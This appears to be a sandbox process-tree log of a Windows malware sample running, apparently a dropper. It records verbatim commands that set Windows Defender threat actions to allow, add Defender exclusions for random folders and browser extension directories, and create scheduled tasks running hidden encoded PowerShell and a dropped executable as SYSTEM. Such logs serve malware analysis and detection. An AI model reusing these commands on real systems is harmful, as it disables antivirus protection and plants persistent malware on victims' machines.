                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:1936
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:2072
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:440
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:4100
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:4472
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:4376
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:4280
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:1096
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:2152
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:3540
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:4272
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:3508
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:4816
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:1892
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:2808
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:2992
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:1904
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:3860
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:4236
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:2896
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:1808
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1976
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4784
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FGzGkKtZcIUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FGzGkKtZcIUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aVcWpEvkOHYsC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aVcWpEvkOHYsC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\avCYxHeOU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\avCYxHeOU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bBzpULueDNPU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bBzpULueDNPU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ytxvjsDOVNaLISvqIgR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ytxvjsDOVNaLISvqIgR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\MIYLeEeCYBaCXaVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\MIYLeEeCYBaCXaVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\MIYBjYAhlshrJpIEE\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\MIYBjYAhlshrJpIEE\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\PXrfLiKCfCnyikun\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\PXrfLiKCfCnyikun\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4968
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FGzGkKtZcIUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2160
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FGzGkKtZcIUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1280
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FGzGkKtZcIUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2028
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aVcWpEvkOHYsC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4272
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aVcWpEvkOHYsC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3444
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\avCYxHeOU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2972
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\avCYxHeOU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3808
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bBzpULueDNPU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4608
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bBzpULueDNPU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2896
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ytxvjsDOVNaLISvqIgR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1808
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ytxvjsDOVNaLISvqIgR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1748
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\MIYLeEeCYBaCXaVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3600
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\MIYLeEeCYBaCXaVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2260
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:932
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:232
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1312
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2384
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\MIYBjYAhlshrJpIEE /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:564
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\MIYBjYAhlshrJpIEE /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4376
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\PXrfLiKCfCnyikun /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:440
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\PXrfLiKCfCnyikun /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:388
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            schtasks /CREATE /TN "gIJMxKVSH" /SC once /ST 13:05:49 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:784
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            schtasks /run /I /tn "gIJMxKVSH"
                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:220
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              schtasks /DELETE /F /TN "gIJMxKVSH"
                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7508
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                schtasks /CREATE /TN "lEnXrdVyZebfdxnHp" /SC once /ST 10:40:14 /RU "SYSTEM" /TR "\"C:\Windows\Temp\PXrfLiKCfCnyikun\XtSdIWwFFlRGWGO\lTXAtVC.exe\" ix /TRsite_idOGC 757674 /S" /V1 /F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7944
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                schtasks /run /I /tn "lEnXrdVyZebfdxnHp"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8012
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4752
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3444
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1320
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\setup_2.exe_id27528300.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\setup_2.exe_id27528300.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
